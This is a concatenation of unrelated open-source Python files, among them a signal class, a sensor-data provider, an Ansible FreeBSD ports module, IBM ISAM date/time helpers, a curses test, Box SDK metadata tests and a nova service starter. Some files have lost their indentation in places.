    once) the next time the signal is fired with a matching keyword set.
    """
    log_domain = "signal"

    def __init__(self):
        # Maps each receiver Deferred to itself.  A dict (rather than a
        # set) preserves the original membership/delete semantics.
        self.receivers = {}

    def matches(self, kwds):
        """
        Override this method in your signal subclass if you want to do keyword
        matching of signal receivers. If you don't override this method, then
        all receivers will match when the signal is fired.
        """
        return True

    def connect(self, **kwds):
        """Connect to a signal. Returns a deferred."""
        d = Deferred()
        d.kwds = kwds
        self.receivers[d] = d
        return d

    def _onDisconnect(self, failure):
        # Swallows the SignalDisconnected errback raised by disconnect() so
        # it is not reported as an unhandled error on the deferred.
        pass

    def disconnect(self, d):
        """Disconnect a receiver from a signal."""
        if d in self.receivers:
            d.addErrback(self._onDisconnect)
            d.errback(SignalDisconnected())
            del self.receivers[d]

    def signal(self, result):
        """Signal all registered receivers."""
        self.log_debug("signaling receivers")
        # Iterate over a snapshot: matched receivers are deleted from
        # self.receivers inside the loop, and a callback may connect or
        # disconnect receivers re-entrantly.  The original code relied on
        # Python 2's .values() returning a fresh list; wrapping in list()
        # keeps this safe on Python 3 dict views as well.
        for d in list(self.receivers.values()):
            if self.matches(d.kwds):
                d.callback(result)
                del self.receivers[d]
| lgpl-2.1 |
maxikov/smartspacedatan | v3/dataprovider.py | 3 | 5376 | #!/usr/bin/env python
import dataloader
import pickle
import os.path
import dataloader
import dataprocessor
import numpy
class DataProvider(object):
def __init__(self, order=1, use_pca=False, pca_nodes_path=None,
db_host="localhost", db_user="root", db_password="",
db_name="andrew", device_list=None, start_time=None,
stop_time=None, debug=False, group_by = 60,
device_groupping = "dict", eliminate_const_one=True,
dtype="float64",
raw_readings_norm_coeffs = {"temp": 1, "light": 1,
"humidity" : 1, "pressure": 1,
"audio_p2p": 1, "motion" : 1}):
self.debug = debug
self.order = order
self.dtype = dtype
self.use_pca = use_pca
self.raw_readings_norm_coeffs = raw_readings_norm_coeffs
self.eliminate_const_one = eliminate_const_one
self.pca_nodes_path = pca_nodes_path
if self.use_pca and not self.pca_nodes_path:
raise Exception("PCA is planned to be used, but PCA nodes path is not specified")
if pca_nodes_path:
self.pca_nodes_filename = os.path.join(self.pca_nodes_path, "%d_order_pnode.p" % self.order)
else:
self.pca_nodes_filename = None
if self.use_pca:
if debug:
print "Loading PCA node from", self.pca_nodes_filename
f = open(self.pca_nodes_filename, "rb")
self.pnode = pickle.load(f)
f.close()
if debug:
print "Loading PCA node done"
self.db_host = db_host
self.db_user = db_user
self.db_password = db_password
self.db_name = db_name
self.data_loader = dataloader.DataLoader(mysql_user = self.db_user, mysql_password = self.db_password, mysql_host = self.db_host, mysql_db = self.db_name)
if start_time and stop_time and device_list:
self.start_time = start_time
self.stop_time = stop_time
self.device_list = device_list
else:
min_t, max_t = self.data_loader.get_min_max_timestamps()
if not start_time:
self.start_time = min_t
if debug:
print "Start time not specified, using %d instead" % self.start_time
else:
self.start_time = start_time
if not stop_time:
self.stop_time = max_t
if debug:
print "Stop time not specified, using %d instead" % self.stop_time
else:
self.stop_time = stop_time
if not device_list:
self.device_list = self.data_loader.fetch_all_macs()
if debug:
print "Device list not specified, using all available instad:"
for device in self.device_list:
print "\t", device
else:
self.device_list = device_list
self.group_by = group_by
self.device_groupping = device_groupping
self._start_t = self.start_time
self._end_t = self.start_time + self.group_by
    def __iter__(self):
        # The provider is its own iterator: iteration state lives in
        # self._start_t / self._end_t, so each instance can be consumed
        # only once.
        return self
def next(self):
    """Return data for the next time window (Python 2 iterator protocol).

    Slides the [_start_t, _end_t) window forward by group_by seconds until
    at least one device produced readings, builds polynomial features per
    device (optionally PCA-reduced), and returns either a dict
    {device: (time, features)} or a numpy matrix, depending on
    self.device_groupping. Raises StopIteration once _end_t reaches
    stop_time.
    """
    if self._end_t >= self.stop_time:
        raise StopIteration
    res = {}
    # Keep advancing the window until some device produced readings.
    while not res:
        if self.debug:
            _t = (self._start_t + self._end_t)/2.0
            percent = 100.0 * (_t - self.start_time)/float((self.stop_time - self.start_time))
            print "Processing from", self._start_t, "to", self._end_t, "(", percent, " % done)"
        for device in self.device_list:
            if self.debug:
                print "Processing device", device
            count, data = self.data_loader.load_data_bundle_normalized(self._start_t, self._end_t, device, self.raw_readings_norm_coeffs)
            if count > 0:
                res[device] = data
                if self.debug:
                    print "Loaded", count, "readings"
            elif self.debug:
                print "No data, skipped"
        if not res:
            # Empty window: skip ahead one group_by interval and bail out
            # when the end of the requested range is reached.
            if self.debug:
                print "No data at all, skipping"
            self._start_t = self._end_t
            self._end_t = self._start_t + self.group_by
            if self._end_t >= self.stop_time:
                raise StopIteration
    for (device, data) in res.items():
        if self.debug:
            print "\nProcessing device", device
            print "Number of readings", len(data)
            print "Number of raw features:", len(data[0])-1
            print "Extracting features"
        uz_data = dataprocessor.unzip_data_bundle(data)
        time_and_feats = dataprocessor.extract_all_features_from_sensors(uz_data)
        if self.debug:
            print len(time_and_feats) - 1, "features extracted"
        if self.debug:
            print "Building polynomial features of order", self.order
        _time, pols = dataprocessor.build_polynomial_features(time_and_feats, order=self.order)
        if self.eliminate_const_one:
            # Drop the constant-1 column produced by the polynomial expansion.
            pols = pols[:,1:]
            if self.debug:
                print "Eliminating constant 1 from features"
        # NOTE(review): pols.size is the total element count of the matrix,
        # not the number of feature columns -- confirm this is intended.
        n_pol_feats = pols.size
        if self.debug:
            print "%d polynomial features created" % n_pol_feats
        res[device] = _time, pols
        if self.use_pca:
            if self.debug:
                print "Applying PCA"
            res[device] = _time, self.pnode.execute(res[device][1])
    # Advance the window for the next call.
    self._start_t = self._end_t
    self._end_t = self._start_t + self.group_by
    if self.device_groupping == "dict":
        return res
    elif self.device_groupping == "numpy_matrix":
        # NOTE(review): only the first feature row ([1][0]) of each device is
        # copied, and res.values() ordering (Python 2 dict order) is relied
        # upon -- confirm both are intended.
        arr = numpy.empty([len(res), n_pol_feats], dtype=self.dtype)
        for i in xrange(len(res)):
            arr[i] = res.values()[i][1][0]
        return arr
def main():
    """Ad-hoc smoke test: stream a fixed 5-minute window for three devices."""
    numpy.set_printoptions(precision=1, linewidth=120, threshold=20, edgeitems=5)
    dataprov = DataProvider(order=1, use_pca = False, pca_nodes_path="../v2/results/2013_10_20_22_svd_true", debug=True, start_time = 1379984887, stop_time = 1379985187, device_list = ["17030002", "17030003", "17030004"], eliminate_const_one=True, device_groupping="numpy_matrix")
    for data in dataprov:
        if False:
            # NOTE(review): dead branch; it also assumes dict mode (.items())
            # while device_groupping above is "numpy_matrix" -- confirm before
            # re-enabling.
            for device, d in data.items():
                print device, d
        print data
if __name__ == "__main__":
main()
| gpl-3.0 |
chrrrles/ansible-modules-extras | packaging/os/portinstall.py | 79 | 6913 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, berenddeboer
# Written by berenddeboer <berend@pobox.com>
# Based on pkgng module written by bleader <bleader at ratonland.org>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: portinstall
short_description: Installing packages from FreeBSD's ports system
description:
- Manage packages for FreeBSD using 'portinstall'.
version_added: "1.3"
options:
name:
description:
- name of package to install/remove
required: true
state:
description:
- state of the package
choices: [ 'present', 'absent' ]
required: false
default: present
use_packages:
description:
- use packages instead of ports whenever available
choices: [ 'yes', 'no' ]
required: false
default: yes
author: "berenddeboer (@berenddeboer)"
'''
EXAMPLES = '''
# Install package foo
- portinstall: name=foo state=present
# Install package security/cyrus-sasl2-saslauthd
- portinstall: name=security/cyrus-sasl2-saslauthd state=present
# Remove packages foo and bar
- portinstall: name=foo,bar state=absent
'''
import json
import shlex
import os
import sys
def query_package(module, name):
    """Return True if package *name* appears to be installed.

    Uses pkg_info when present (pre-pkgng tool chain), otherwise falls
    back to pkgng's ``pkg info``. If the literal name is not found, a
    digit-stripped variant is also tried, because e.g.
    databases/mysql55-client installs as mysql-client.

    module -- AnsibleModule instance (provides get_bin_path/run_command)
    name   -- package name, possibly with a ports-category prefix
    """
    pkg_info_path = module.get_bin_path('pkg_info', False)

    # Assume that if we have pkg_info, we haven't upgraded to pkgng.
    if pkg_info_path:
        # required=True: fail the module early if pkg_glob is missing.
        pkg_glob_path = module.get_bin_path('pkg_glob', True)
        rc, out, err = module.run_command("%s -e `pkg_glob %s`" % (pkg_info_path, pipes.quote(name)), use_unsafe_shell=True)
    else:
        pkg_info_path = module.get_bin_path('pkg', True) + " info"
        rc, out, err = module.run_command("%s %s" % (pkg_info_path, name))

    found = rc == 0

    if not found:
        # Retry with digits removed (mysql55-client -> mysql-client). Pity
        # FreeBSD doesn't have a fool-proof way of checking whether some
        # package is installed. The retry command is the same for both tool
        # chains, so the old duplicated pkgng/if-else branches were removed.
        name_without_digits = re.sub('[0-9]', '', name)
        if name != name_without_digits:
            rc, out, err = module.run_command("%s %s" % (pkg_info_path, name_without_digits))
            found = rc == 0

    return found
def matching_packages(module, name):
    """Count how many ports match *name* according to ports_glob.

    Falls back to a digit-stripped variant of the name (mysql55 -> mysql)
    when the literal name matches nothing.
    """
    ports_glob_path = module.get_bin_path('ports_glob', True)
    rc, out, err = module.run_command("%s %s" % (ports_glob_path, name))
    # ports_glob prints one match per line, so counting newlines counts
    # the number of matching ports.
    occurrences = out.count('\n')
    if occurrences == 0:
        stripped = re.sub('[0-9]', '', name)
        if name != stripped:
            rc, out, err = module.run_command("%s %s" % (ports_glob_path, stripped))
            occurrences = out.count('\n')
    return occurrences
def remove_packages(module, packages):
    """Remove each installed package in *packages*; never returns normally.

    Exits through module.exit_json (changed=True when anything was removed)
    or module.fail_json on the first package that could not be removed.
    """
    remove_c = 0
    # NOTE(review): pkg_glob is required (True) even on pkgng-only systems
    # where only 'pkg' exists -- confirm pkg_glob is present there.
    pkg_glob_path = module.get_bin_path('pkg_glob', True)
    # If pkg_delete not found, we assume pkgng
    pkg_delete_path = module.get_bin_path('pkg_delete', False)
    if not pkg_delete_path:
        pkg_delete_path = module.get_bin_path('pkg', True)
        pkg_delete_path = pkg_delete_path + " delete -y"
    # Using a for loop incase of error, we can report the package that failed
    for package in packages:
        # Query the package first, to see if we even need to remove
        if not query_package(module, package):
            continue
        rc, out, err = module.run_command("%s `%s %s`" % (pkg_delete_path, pkg_glob_path, pipes.quote(package)), use_unsafe_shell=True)
        # Still installed? Retry with digits stripped (mysql55 -> mysql),
        # mirroring the lookup fallback in query_package().
        if query_package(module, package):
            name_without_digits = re.sub('[0-9]', '', package)
            rc, out, err = module.run_command("%s `%s %s`" % (pkg_delete_path, pkg_glob_path, pipes.quote(name_without_digits)),use_unsafe_shell=True)
            if query_package(module, package):
                module.fail_json(msg="failed to remove %s: %s" % (package, out))
        remove_c += 1
    if remove_c > 0:
        module.exit_json(changed=True, msg="removed %s package(s)" % remove_c)
    module.exit_json(changed=False, msg="package(s) already absent")
def install_packages(module, packages, use_packages):
    """Install each package in *packages* via portinstall; never returns.

    Bootstraps portinstall itself (through pkg) when it is missing. When
    use_packages is true, portinstall may use pre-built packages instead
    of compiling ports. Exits through module.exit_json, or fail_json on
    the first package that fails or matches an ambiguous name.
    """
    install_c = 0

    # If portinstall not found, automagically install it via pkg.
    portinstall_path = module.get_bin_path('portinstall', False)
    if not portinstall_path:
        pkg_path = module.get_bin_path('pkg', False)
        if pkg_path:
            module.run_command("pkg install -y portupgrade")
        portinstall_path = module.get_bin_path('portinstall', True)

    # BUG FIX: main() declares use_packages with type='bool', so Ansible
    # hands us a real bool here. The old check `use_packages == "yes"` was
    # therefore always False and --use-packages was never passed. A plain
    # truthiness test handles the bool (and remains true for a literal
    # "yes" string, keeping backward compatibility).
    if use_packages:
        portinstall_params = "--use-packages"
    else:
        portinstall_params = ""

    for package in packages:
        if query_package(module, package):
            continue

        # Refuse ambiguous names: exactly one port must match.
        matches = matching_packages(module, package)
        if matches == 1:
            rc, out, err = module.run_command("%s --batch %s %s" % (portinstall_path, portinstall_params, package))
            if not query_package(module, package):
                module.fail_json(msg="failed to install %s: %s" % (package, out))
        elif matches == 0:
            module.fail_json(msg="no matches for package %s" % (package))
        else:
            module.fail_json(msg="%s matches found for package name %s" % (matches, package))

        install_c += 1

    if install_c > 0:
        module.exit_json(changed=True, msg="present %s package(s)" % (install_c))

    module.exit_json(changed=False, msg="package(s) already present")
def main():
    """Ansible entry point: parse module parameters and dispatch.

    'name' may be a comma-separated list of packages; 'state' selects
    install (present) or removal (absent).
    """
    module = AnsibleModule(
        argument_spec = dict(
            state = dict(default="present", choices=["present","absent"]),
            name = dict(aliases=["pkg"], required=True),
            use_packages = dict(type='bool', default='yes')))

    p = module.params

    # Comma-separated list of package names.
    pkgs = p["name"].split(",")

    if p["state"] == "present":
        install_packages(module, pkgs, p["use_packages"])

    elif p["state"] == "absent":
        remove_packages(module, pkgs)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
IBM-Security/ibmsecurity | ibmsecurity/isam/base/date_time.py | 1 | 4844 | import logging
import ibmsecurity.utilities.tools
logger = logging.getLogger(__name__)
requires_model="Appliance"
def get(isamAppliance, check_mode=False, force=False):
    """
    Retrieving the current date and time settings
    """
    description = "Retrieving the current date and time settings"
    return isamAppliance.invoke_get(description, "/time_cfg",
                                    requires_model=requires_model)
def get_timezones(isamAppliance, check_mode=False, force=False):
    """
    Retrieving the list of valid timezones
    """
    description = "Retrieving the list of valid timezones"
    return isamAppliance.invoke_get(description, "/time_cfg/I18nTimezone",
                                    requires_model=requires_model)
# NOTE: the name shadows the builtin set(); kept for API compatibility.
def set(isamAppliance, ntpServers="", timeZone="America/New_York", enableNtp=False, dateTime=None, check_mode=False, force=False):
    """
    Update date/time settings (set NTP server and timezone)
    """
    # The REST API expects a placeholder datetime when none is supplied.
    if dateTime is None:
        dateTime = "0000-00-00 00:00:00"

    matches, warnings = _check(isamAppliance=isamAppliance, timeZone=timeZone,
                               ntpServers=ntpServers, enableNtp=enableNtp)

    if force is True or matches is False:
        if check_mode is True:
            return isamAppliance.create_return_object(changed=True, warnings=warnings)
        payload = {
            "dateTime": dateTime,
            "timeZone": timeZone,
            "enableNtp": enableNtp,
            "ntpServers": ntpServers
        }
        return isamAppliance.invoke_put(
            "Setting date/time settings (NTP)",
            "/time_cfg",
            payload,
            requires_model=requires_model
        )

    # Already configured as requested - nothing to change.
    return isamAppliance.create_return_object(warnings=warnings)
def disable(isamAppliance, check_mode=False, force=False):
    """
    Disable NTP settings, leaves all other settings intact
    """
    current = get(isamAppliance)
    warnings = current['warnings']

    # Docker appliances do not support this endpoint; hand the warning back.
    if warnings != [] and "Docker" in warnings[0]:
        return isamAppliance.create_return_object(warnings=warnings)

    ntp_cfg = current['data']['ntpConfig']
    if force is True or ntp_cfg['enableNtp'] == True:
        if check_mode is True:
            return isamAppliance.create_return_object(changed=True, warnings=warnings)
        # Re-submit the current settings unchanged, with NTP switched off.
        servers = ','.join(entry['ntpServer'] for entry in ntp_cfg['ntpServers'])
        payload = {
            'dateTime': current['data']['dateTime'],
            'timeZone': current['data']['timeZone'],
            'enableNtp': False,
            'ntpServers': servers
        }
        return isamAppliance.invoke_put(
            "Setting date/time settings (NTP)",
            "/time_cfg",
            payload,
            requires_model=requires_model
        )

    return isamAppliance.create_return_object(warnings=warnings)
def _check(isamAppliance, timeZone, ntpServers, enableNtp):
    """
    Check if NTP is already set for syncing date/time
    If timezone or ntpservers provided then also check if those values match what is currently set

    Returns (matches, warnings).
    """
    current = get(isamAppliance)
    warnings = current['warnings']

    # Docker appliances cannot be configured; report a match so that no
    # change is attempted.
    if warnings != [] and "Docker" in warnings[0]:
        return True, warnings

    data = current['data']
    if data['ntpConfig']['enableNtp'] != enableNtp:
        return False, warnings

    if timeZone != data['timeZone']:
        logger.info("Existing timeZone is different")
        return False, warnings

    if ntpServers != None:
        # Compare as order-insensitive sets of server names.
        existing_servers = [entry['ntpServer'] for entry in data['ntpConfig']['ntpServers']]
        logger.debug(str(sorted(existing_servers)))
        logger.debug(str(sorted(ntpServers.split(','))))
        if sorted(ntpServers.split(',')) != sorted(existing_servers):
            logger.debug("Existing ntpServers are different")
            return False, warnings

    return True, warnings
def compare(isamAppliance1, isamAppliance2):
    """
    Compare date/time settings between two appliances

    The live date/time value is excluded from the comparison: on correctly
    synced appliances it matches anyway, and a transient difference is not
    configuration drift.
    """
    ret_obj1 = get(isamAppliance1)
    ret_obj2 = get(isamAppliance2)

    if ret_obj1['warnings'] != []:
        if 'Docker' in ret_obj1['warnings'][0]:
            return isamAppliance1.create_return_object(warnings=ret_obj1['warnings'])
    if ret_obj2['warnings'] != []:
        if 'Docker' in ret_obj2['warnings'][0]:
            return isamAppliance2.create_return_object(warnings=ret_obj2['warnings'])

    # Ignore actual date / time on servers - they should be same if synced correctly
    if 'dateTime' in ret_obj1['data']:
        del ret_obj1['data']['dateTime']
    if 'dateTime' in ret_obj2['data']:
        del ret_obj2['data']['dateTime']

    # BUG FIX: the key actually deleted above is 'dateTime' (camelCase);
    # the old code reported 'datetime' to json_compare, which therefore
    # did not record the right ignored key.
    return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=['dateTime'])
| apache-2.0 |
wavesoft/LiveQ | liveq-dashboard/liveq-dashboard.py | 1 | 1629 | #!/usr/bin/python
################################################################
# LiveQ - An interactive volunteering computing batch system
# Copyright (C) 2013 Ioannis Charalampidis
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
################################################################
# ----------
import sys
sys.path.append("../liveq-common")
# ----------
import logging
import time
import signal
import sys
from dashboard.config import Config
from dashboard.component import DashboardComponent
from liveq import handleSIGINT, exit
from liveq.events import GlobalEvents
from liveq.exceptions import ConfigException
# Prepare runtime configuration
runtimeConfig = { }

# Load configuration
# NOTE(review): the config filename still says 'jobmanager.conf.local';
# confirm the dashboard should not have its own config file.
try:
	Config.fromFile( "config/jobmanager.conf.local", runtimeConfig )
except ConfigException as e:
	print("ERROR Configuration exception: %s" % e)
	exit(1)

# Hook sigint -> Shutdown
handleSIGINT()

# Start the dashboard component
# BUG FIX: the original called JobManagerComponent.runThreaded(), but
# JobManagerComponent is never imported in this file (copy/paste from the
# job-manager entry point) and would raise NameError. The component this
# entry point imports and must run is DashboardComponent.
DashboardComponent.runThreaded()
mancoast/CPythonPyc_test | cpython/220_test_curses.py | 10 | 6038 | #
# Test script for the curses module
#
# This script doesn't actually display anything very coherent. but it
# does call every method and function.
#
# Functions not tested: {def,reset}_{shell,prog}_mode, getch(), getstr(),
# getmouse(), ungetmouse(), init_color()
#
import curses, sys, tempfile
# Optionally test curses module. This currently requires that the
# 'curses' resource be given on the regrtest command line using the -u
# option. If not available, nothing after this line will be executed.
import test_support
test_support.requires('curses')
def window_funcs(stdscr):
    "Test the methods of windows"
    win = curses.newwin(10,10)
    win = curses.newwin(5,5, 5,5)
    win2 = curses.newwin(15,15, 5,5)
    # Exercise addch/addstr with every supported argument combination.
    # NOTE(review): ('a') is a plain string, not a 1-tuple; apply() unpacks
    # it to a single 'a' argument, which happens to be what is wanted here.
    for meth in [stdscr.addch, stdscr.addstr]:
        for args in [('a'), ('a', curses.A_BOLD),
                     (4,4, 'a'), (5,5, 'a', curses.A_BOLD)]:
            apply(meth, args)
    # Window methods that take no arguments.
    for meth in [stdscr.box, stdscr.clear, stdscr.clrtobot,
                 stdscr.clrtoeol, stdscr.cursyncup, stdscr.delch,
                 stdscr.deleteln, stdscr.erase, stdscr.getbegyx,
                 stdscr.getbkgd, stdscr.getkey, stdscr.getmaxyx,
                 stdscr.getparyx, stdscr.getyx, stdscr.inch,
                 stdscr.insertln, stdscr.instr, stdscr.is_wintouched,
                 win.noutrefresh, stdscr.redrawwin, stdscr.refresh,
                 stdscr.standout, stdscr.standend, stdscr.syncdown,
                 stdscr.syncup, stdscr.touchwin, stdscr.untouchwin]:
        meth()
    # Methods that need specific arguments, in every calling form.
    stdscr.addnstr('1234', 3)
    stdscr.addnstr('1234', 3, curses.A_BOLD)
    stdscr.addnstr(4,4, '1234', 3)
    stdscr.addnstr(5,5, '1234', 3, curses.A_BOLD)
    stdscr.attron(curses.A_BOLD)
    stdscr.attroff(curses.A_BOLD)
    stdscr.attrset(curses.A_BOLD)
    stdscr.bkgd(' ')
    stdscr.bkgd(' ', curses.A_REVERSE)
    stdscr.bkgdset(' ')
    stdscr.bkgdset(' ', curses.A_REVERSE)
    win.border(65, 66, 67, 68,
               69, 70, 71, 72)
    win.border('|', '!', '-', '_',
               '+', '\\', '#', '/')
    # border() must reject a non-character argument with TypeError.
    try:
        win.border(65, 66, 67, 68,
                   69, [], 71, 72)
    except TypeError:
        pass
    else:
        raise RuntimeError, "Expected win.border() to raise TypeError"
    stdscr.clearok(1)
    win4 = stdscr.derwin(2,2)
    win4 = stdscr.derwin(1,1, 5,5)
    win4.mvderwin(9,9)
    stdscr.echochar('a')
    stdscr.echochar('a', curses.A_BOLD)
    stdscr.hline('-', 5)
    stdscr.hline('-', 5, curses.A_BOLD)
    stdscr.hline(1,1,'-', 5)
    stdscr.hline(1,1,'-', 5, curses.A_BOLD)
    stdscr.idcok(1)
    stdscr.idlok(1)
    stdscr.immedok(1)
    stdscr.insch('c')
    stdscr.insdelln(1)
    stdscr.insnstr('abc', 3)
    stdscr.insnstr('abc', 3, curses.A_BOLD)
    stdscr.insnstr(5, 5, 'abc', 3)
    stdscr.insnstr(5, 5, 'abc', 3, curses.A_BOLD)
    stdscr.insstr('def')
    stdscr.insstr('def', curses.A_BOLD)
    stdscr.insstr(5, 5, 'def')
    stdscr.insstr(5, 5, 'def', curses.A_BOLD)
    stdscr.is_linetouched(0)
    stdscr.keypad(1)
    stdscr.leaveok(1)
    stdscr.move(3,3)
    win.mvwin(2,2)
    stdscr.nodelay(1)
    stdscr.notimeout(1)
    win2.overlay(win)
    win2.overwrite(win)
    stdscr.redrawln(1,2)
    stdscr.scrollok(1)
    stdscr.scroll()
    stdscr.scroll(2)
    stdscr.scroll(-3)
    stdscr.setscrreg(10,15)
    win3 = stdscr.subwin(10,10)
    win3 = stdscr.subwin(10,10, 5,5)
    stdscr.syncok(1)
    stdscr.timeout(5)
    stdscr.touchline(5,5)
    stdscr.touchline(5,5,0)
    stdscr.vline('a', 3)
    stdscr.vline('a', 3, curses.A_STANDOUT)
    stdscr.vline(1,1, 'a', 3)
    stdscr.vline(1,1, 'a', 3, curses.A_STANDOUT)
    # Methods that only exist on some curses builds/platforms.
    if hasattr(curses, 'resize'):
        stdscr.resize()
    if hasattr(curses, 'enclose'):
        stdscr.enclose()
def module_funcs(stdscr):
    "Test module-level functions"
    # Module-level functions callable with no arguments.
    for func in [curses.baudrate, curses.beep, curses.can_change_color,
                 curses.cbreak, curses.def_prog_mode, curses.doupdate,
                 curses.filter, curses.flash, curses.flushinp,
                 curses.has_colors, curses.has_ic, curses.has_il,
                 curses.isendwin, curses.killchar, curses.longname,
                 curses.nocbreak, curses.noecho, curses.nonl,
                 curses.noqiflush, curses.noraw,
                 curses.reset_prog_mode, curses.termattrs,
                 curses.termname, curses.erasechar, curses.getsyx]:
        func()
    # Functions that actually need arguments
    curses.curs_set(1)
    curses.delay_output(1)
    curses.echo() ; curses.echo(1)
    # Round-trip a window through putwin()/getwin() via a temp file.
    f = tempfile.TemporaryFile()
    stdscr.putwin(f)
    f.seek(0)
    curses.getwin(f)
    f.close()
    curses.halfdelay(1)
    curses.intrflush(1)
    curses.meta(1)
    curses.napms(100)
    curses.newpad(50,50)
    win = curses.newwin(5,5)
    win = curses.newwin(5,5, 1,1)
    curses.nl() ; curses.nl(1)
    curses.putp('abc')
    curses.qiflush()
    curses.raw() ; curses.raw(1)
    curses.setsyx(5,5)
    curses.setupterm(fd=sys.__stdout__.fileno())
    curses.tigetflag('hc')
    curses.tigetnum('co')
    curses.tigetstr('cr')
    curses.tparm('cr')
    curses.typeahead(sys.__stdin__.fileno())
    curses.unctrl('a')
    curses.ungetch('a')
    curses.use_env(1)
    # Functions only available on a few platforms
    if curses.has_colors():
        curses.start_color()
        curses.init_pair(2, 1,1)
        curses.color_content(1)
        curses.color_pair(2)
        curses.pair_content(curses.COLOR_PAIRS)
        curses.pair_number(0)
    if hasattr(curses, 'keyname'):
        curses.keyname(13)
    if hasattr(curses, 'has_key'):
        curses.has_key(13)
    if hasattr(curses, 'getmouse'):
        curses.mousemask(curses.BUTTON1_PRESSED)
        curses.mouseinterval(10)
def main(stdscr):
    """Run both test batteries, restoring the tty state afterwards."""
    curses.savetty()
    try:
        module_funcs(stdscr)
        window_funcs(stdscr)
    finally:
        # Leave the terminal as we found it even if a test raised.
        curses.resetty()
if __name__ == '__main__':
    # Run standalone: curses.wrapper handles init/cleanup around main().
    curses.wrapper(main)
else:
    # Imported by the regression-test harness: drive curses manually
    # instead of going through curses.wrapper().
    try:
        stdscr = curses.initscr()
        main(stdscr)
    finally:
        curses.endwin()
samkuehn/box-python-sdk | test/unit/object/test_metadata.py | 5 | 3440 | # coding: utf-8
from __future__ import unicode_literals
import json
import pytest
from boxsdk.object.metadata import MetadataUpdate
@pytest.fixture
def metadata_response():
    """Canned metadata instance as returned by the Box metadata API."""
    return {
        '$id': 'c79896a0-a33f-11e3-a5e2-0800200c9a66',
        '$type': 'properties',
        '$parent': 'file_552345101',
        'client_number': '820183',
        'client_name': 'Biomedical Corp',
        'case_reference': 'A83JAA',
        'case_type': 'Employment Litigation',
        'assigned_attorney': 'Francis Burke',
        'case_status': 'in-progress',
    }
@pytest.fixture(params=['enterprise', 'global'])
def metadata_scope(request):
    """Parametrized fixture: run each test against both metadata scopes."""
    return request.param
@pytest.fixture
def metadata_template():
    """Metadata template name used throughout these tests."""
    return 'properties'
@pytest.mark.parametrize('success', [True, False])
def test_delete(mock_box_session, make_mock_box_request, test_file, metadata_scope, metadata_template, success):
    """delete() DELETEs the metadata URL and returns the HTTP success flag."""
    # pylint:disable=redefined-outer-name
    mock_box_session.delete.return_value, _ = make_mock_box_request(response_ok=success)
    metadata = test_file.metadata(metadata_scope, metadata_template)
    assert metadata.delete() is success
    mock_box_session.delete.assert_called_once_with(metadata.get_url())
def test_create(
        mock_box_session,
        make_mock_box_request,
        test_file,
        metadata_scope,
        metadata_template,
        metadata_response,
):
    """create() POSTs the metadata as JSON and returns the parsed response."""
    # pylint:disable=redefined-outer-name
    mock_box_session.post.return_value, _ = make_mock_box_request(response=metadata_response)
    metadata = test_file.metadata(metadata_scope, metadata_template)
    response = metadata.create(metadata_response)
    assert response is metadata_response
    mock_box_session.post.assert_called_once_with(
        metadata.get_url(),
        data=json.dumps(metadata_response),
        headers={b'Content-Type': b'application/json'},
    )
def test_get(
        mock_box_session,
        make_mock_box_request,
        test_file,
        metadata_scope,
        metadata_template,
        metadata_response,
):
    """get() GETs the metadata URL and returns the parsed response."""
    # pylint:disable=redefined-outer-name
    mock_box_session.get.return_value, _ = make_mock_box_request(response=metadata_response)
    metadata = test_file.metadata(metadata_scope, metadata_template)
    response = metadata.get()
    assert response is metadata_response
    mock_box_session.get.assert_called_once_with(metadata.get_url())
@pytest.fixture
def metadata_update():
    """A MetadataUpdate carrying one operation of each supported type."""
    update = MetadataUpdate()
    update.add('path', 'value')
    update.remove('path', 'value')
    update.test('path', 'value')
    update.update('path', 'value', 'value')
    return update
def test_update(
        mock_box_session,
        make_mock_box_request,
        test_file,
        metadata_scope,
        metadata_template,
        metadata_response,
        metadata_update,
):
    """update() PUTs the update ops as a JSON-patch and returns the response."""
    # pylint:disable=redefined-outer-name
    mock_box_session.put.return_value, _ = make_mock_box_request(response=metadata_response)
    metadata = test_file.metadata(metadata_scope, metadata_template)
    response = metadata.update(metadata_update)
    assert response is metadata_response
    mock_box_session.put.assert_called_once_with(
        metadata.get_url(),
        data=json.dumps(metadata_update.ops),
        headers={b'Content-Type': b'application/json-patch+json'},
    )
def test_start_update(test_file):
    """start_update() hands back a fresh MetadataUpdate builder."""
    update = test_file.metadata().start_update()
    assert isinstance(update, MetadataUpdate)
| apache-2.0 |
zzicewind/nova | nova/cmd/all.py | 61 | 3408 | # Copyright 2011 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starter script for all nova services.
This script attempts to start all the nova services in one process. Each
service is started in its own greenthread. Please note that exceptions and
sys.exit() on the starting of a service are logged and the script will
continue attempting to launch the rest of the services.
"""
import sys
from oslo_config import cfg
from oslo_log import log as logging
from nova import config
from nova.i18n import _LE
from nova import objects
from nova.objectstore import s3server
from nova import service
from nova import utils
from nova.vnc import xvp_proxy
CONF = cfg.CONF
